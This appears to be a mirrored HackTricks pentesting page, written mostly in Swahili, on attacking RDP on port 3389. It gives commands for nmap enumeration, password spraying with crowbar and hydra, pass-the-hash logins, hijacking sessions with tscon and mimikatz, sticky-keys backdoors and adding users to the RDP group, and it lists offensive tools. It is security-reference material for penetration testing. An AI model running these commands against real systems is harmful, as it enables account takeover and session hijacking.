maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-rdp.md

132 lines
5.5 KiB
Markdown
Raw Blame History

# 3389 - Pentesting RDP
{{#include ../banners/hacktricks-training.md}}
## Basic Information
Imetengenezwa na Microsoft, **Remote Desktop Protocol** (**RDP**) imeundwa kuwezesha muunganisho wa kiolesura cha picha kati ya kompyuta kupitia mtandao. Ili kuanzisha muunganisho kama huo, programu ya mteja wa **RDP** inatumika na mtumiaji, na kwa wakati mmoja, kompyuta ya mbali inahitaji kufanya kazi na programu ya seva ya **RDP**. Mpangilio huu unaruhusu udhibiti na ufikiaji wa mazingira ya desktop ya kompyuta ya mbali, kwa msingi unaleta kiolesura chake kwenye kifaa cha mtumiaji.
**Default port:** 3389
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
## Enumeration
### Automatic
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
```
Inakagua usimbuaji uliopo na udhaifu wa DoS (bila kusababisha DoS kwa huduma) na kupata taarifa za NTLM Windows (matoleo).
### [Brute force](../generic-hacking/brute-force.md#rdp)
**Kuwa makini, unaweza kufunga akaunti**
### **Password Spraying**
**Kuwa makini, unaweza kufunga akaunti**
```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
### Unganisha na akisi/neno la siri linalojulikana
```bash
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
### Angalia akidi zinazojulikana dhidi ya huduma za RDP
rdp_check.py kutoka impacket inakuwezesha kuangalia ikiwa akidi fulani ni halali kwa huduma ya RDP:
```bash
rdp_check <domain>/<name>:<password>@<IP>
```
## **Mashambulizi**
### Kuiba kikao
Kwa **idhini ya SYSTEM** unaweza kufikia **kikao chochote cha RDP kilichofunguliwa na mtumiaji yeyote** bila haja ya kujua nenosiri la mmiliki.
**Pata vikao vilivyofunguliwa:**
```
query user
```
**Upatikanaji wa kikao kilichochaguliwa**
```bash
tscon <ID> /dest:<SESSIONNAME>
```
Sasa utakuwa ndani ya kikao cha RDP kilichochaguliwa na utajifanya kuwa mtumiaji ukitumia tu zana na vipengele vya Windows.
**Muhimu**: Unapofikia vikao vya RDP vilivyo hai, utamfukuza mtumiaji ambaye alikuwa akivitumia.
Unaweza kupata nywila kutoka kwa mchakato kwa kuutupa, lakini njia hii ni ya haraka zaidi na inakuwezesha kuingiliana na desktop za mtumiaji (nywila katika notepad bila kuhifadhiwa kwenye diski, vikao vingine vya RDP vikiwa wazi kwenye mashine nyingine...)
#### **Mimikatz**
Pia unaweza kutumia mimikatz kufanya hivi:
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
### Sticky-keys & Utilman
Kuchanganya mbinu hii na **stickykeys** au **utilman utaweza kufikia CMD ya usimamizi na kikao chochote cha RDP wakati wowote**
Unaweza kutafuta RDP ambazo zimewekwa nyuma kwa kutumia moja ya mbinu hizi tayari na: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
### RDP Process Injection
Ikiwa mtu kutoka eneo tofauti au mwenye **privileges bora anapoingia kupitia RDP** kwenye PC ambapo **wewe ni Admin**, unaweza **kuingiza** beacon yako katika **mchakato wa kikao chake cha RDP** na kutenda kama yeye:
{{#ref}}
../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
{{#endref}}
### Adding User to RDP group
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
## Automatic Tools
- [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn** ni mfumo wa baada ya unyakuzi ulioandikwa kwa Powershell, ulioandaliwa hasa kuendesha kiotomatiki shambulio la **Shadow** kwenye kompyuta za Microsoft Windows. Uthibitisho huu (ulioorodheshwa kama kipengele na Microsoft) unaruhusu mshambuliaji wa mbali **kuona desktop ya mwathirika bila idhini yake**, na hata kuidhibiti kwa mahitaji, akitumia zana za asili za mfumo wa uendeshaji wenyewe.
- [**EvilRDP**](https://github.com/skelsec/evilrdp)
- Dhibiti panya na kibodi kwa njia ya kiotomatiki kutoka kwa mstari wa amri
- Dhibiti clipboard kwa njia ya kiotomatiki kutoka kwa mstari wa amri
- Tengeneza proxy ya SOCKS kutoka kwa mteja inayochanganya mawasiliano ya mtandao na lengo kupitia RDP
- Tekeleza amri za SHELL na PowerShell bila kupakia faili
- Pakia na pakua faili kutoka/kwa lengo hata wakati uhamishaji wa faili umekataliwa kwenye lengo
- [**SharpRDP**](https://github.com/0xthirteen/SharpRDP)
Zana hii inaruhusu kutekeleza amri kwenye RDP ya mwathirika **bila kuhitaji kiolesura cha picha**.
## HackTricks Automatic Commands
```
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink